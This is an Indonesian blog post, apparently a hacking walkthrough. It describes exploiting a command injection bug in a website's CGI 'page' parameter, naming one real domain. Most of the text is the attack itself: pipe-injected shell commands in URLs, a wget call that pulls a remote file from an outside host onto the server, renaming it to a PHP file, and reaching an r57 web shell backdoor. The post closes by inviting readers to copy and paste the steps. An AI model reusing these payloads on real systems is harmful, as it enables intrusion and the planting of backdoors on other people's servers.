Diarsipkan di bawah: Hacking and security
S
Suatu ketika seorang user membuka situs www.*********.com, dan ternyata didapati suatu hal yang ganjil. Yaitu sebuah bug bernama remote command execution. Apa itu Remote Command Execution? Yaitu bug yang memungkinkan seorang user memberikan perintah-perintah sistem operasi terhadap web tersebut. Berbahaya? Sangat berbahaya. Mengapa? Berikut liputannya.. 
Dalam proses browsing di google si pembaca merasa aneh dengan situs ini http://aurorum.se, dengan url lengkap http://***********/index.cgi?page=index.html. Pemanggilan dengan sistem inclusi file tersebut dapat menjadi kecurigaan tertentu bagi seorang yang belajar hacking. Saat itu user langsung melakukan perintah berikutnya
http://***********/index.cgi?page=|ls -al|
Apa hasilnya? Ternyata daftar listing file dalam direktori tersebut muncul seluruhnya. Lantas dia mencoba lagi.
http://***********/index.cgi?page=|which wget|
Apa hasilnya? Didapati hasilnya adalah sebagai berikut
/usr/bin/wget
Jelas sekali si User ini berusaha mencari dimana letak wget.. Selanjutnya si user ini melakukan lagi perintah berikut.
http://***********/index.cgi?page=|/usr/bin/wget http://geocities.com/must_bemore/move1.txt|
Nah, malah donlod file? Tapi apa dulu yang di donlod? Berhasilkah? Itulah yang dia lakukan .. mengecek apakah berhasil atau tidak..
http://************/index.cgi?PAGE=|ls%20-al|grep%20move|
Apa yang didapat?
-rw-r–r– 1 ********* ********** 85604 Jul 24 2007 move1.txt
Weh berhasil downloadnya.. Lantas?
http://***********/index.cgi?PAGE=|mv move1.txt curriculum.php|
Weks.. mencurigakan.. Lanjut?
http://************/curriculum.php
Apa hasilnya???
Script R57 Shell
Nah gimana tuh? Itulah yang disebut dengan script r57 yang berfungsi sebagai backdoor. Bisa dilihat di sini. Permainan pun berakhir..
Silakan copy paste
Belum Ada Tanggapan sejauh ini
Tinggalkan komentar
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <pre> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>
